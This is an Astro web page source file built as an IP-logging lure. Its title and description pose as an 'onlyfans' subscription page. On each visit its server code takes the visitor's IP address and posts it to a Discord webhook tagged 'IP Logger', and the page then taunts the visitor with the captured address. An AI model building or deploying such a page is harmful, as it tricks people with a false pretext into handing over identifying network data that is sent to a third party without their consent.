---
// src/pages/index.astro
import Container from "@/components/Container.astro";
import Layout from "../layouts/Layout.astro";

const ip = Astro.clientAddress;
const webhookUrl = import.meta.env.DEV ?
  import.meta.env.DEV_DISCORD_WEBHOOK_URL :
  import.meta.env.DISCORD_WEBHOOK_URL

const embed = {
  title: 'New Visitor Detected',
  description: `We got a new visitor on the site. Here’s their IP address: **${ip}**`,
  color: 0xff0000, // Red color for the embed
  timestamp: new Date().toISOString(),
  footer: {
    text: 'IP Logger',
  },
  fields: [
    {
      name: 'IP Address',
      value: ip,
      inline: true,
    },
    {
      name: 'Timestamp',
      value: new Date().toLocaleString(),
      inline: true,
    },
  ],
};

await fetch(webhookUrl, {
  method: "POST",
  headers: {
    "Content-Type": "application/json",
  },
  body: JSON.stringify({
    embeds: [embed],
  }),
})
---

<Layout title="onlyfans | astro" description="Subscribe to my onlyfans channel xoxo!">
  <Container>
    <div class="flex flex-col items-center justify-between text-center">
      <h1>Think u smart buddy?</h1>
      <p>Got yo IP address</p>
      <p class="font-semibold">{ip}</p>
    </div>
  </Container>
</Layout>
